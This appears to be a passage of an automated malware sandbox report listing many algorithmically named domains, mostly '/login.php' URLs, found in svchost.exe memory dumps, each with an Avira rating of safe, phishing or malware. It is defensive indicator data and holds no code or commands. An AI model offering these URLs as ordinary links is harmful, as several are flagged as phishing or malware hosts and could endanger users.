                                                                                                                                                                                                          http://pupycuv.com/login.phpsvchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qetykyq.com/login.phpsvchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qetyvil.com/login.phpsvchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vofypam.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qetynev.com/login.phpsvchost.exe, 00000002.00000003.2023171652.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2021041342.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2016992308.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020592252.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2021195264.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019866036.00000000029A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vocyrom.com/http://gahyhys.com/http://gahyhys.com/http://qegyhev.com/http://purycul.com/http:svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qegyval.com/login.phpsvchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354079849.0000000006721000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346621948.0000000006721000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351902681.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1950495039.000000000660F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lygyvuj.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593963408.00000000029F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gaqyres.com/login.phpsvchost.exe, 00000002.00000003.2577183287.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2586584940.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593963408.00000000029F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593876696.00000000029C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575606390.00000000029BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyvymir.com/login.phpsvchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899516782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyxygur.com/login.phpsvchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2589839623.0000000002946000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575906953.0000000002944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gacycaz.com/login.phpsvchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puzybil.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450513652.00000000029E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vojybim.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071802239.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066831254.00000000029CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lykyfax.com/http://lykyfax.com/http://pupypil.com/http://qedyxuq.com/http://qedyxuq.com/Xvjsvchost.exe, 00000002.00000003.2576508233.000000000B411000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615882312.000000000B41C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576724081.000000000B41B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://ganykaz.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qeqyxyp.com/login.phpsvchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031225695.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043884959.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053087644.00000000029CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qegyfyp.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789493415.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790177343.00000000066E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797402976.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793360892.000000000B449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qeqykog.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369953601.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373953300.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyxygax.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071802239.0000000002945000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyxyxox.com/login.phpsvchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qedykiv.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004799359.00000000066BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998878428.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998684932.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2001263336.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://ganypeb.com/login.phpcsvchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lymywaj.com/login.phpsvchost.exe, 00000002.00000003.1897979252.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899516782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qekyvav.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://ww16.vofycot.com/login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9ehttp://ww16.vofycot.com/lsvchost.exe, 00000002.00000003.2119703329.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023171652.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004394237.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055181884.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003033215.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2125785660.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088268676.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045392452.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106127398.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036974301.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019866036.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071756308.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2083355602.00000000029A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puvydov.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gahyqub.com/login.phpsvchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qekyqop.com/login.phpsvchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796738953.00000000066C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145251441.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151201367.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1357846659.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581298263.00000000066BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://volyquk.com/login.phpsvchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036084916.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pupywog.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lymyxex.com/login.phpsvchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puzyxip.com/login.phpsvchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gahydos.com/k/LMEMsvchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gacynuz.com/login.phpsvchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
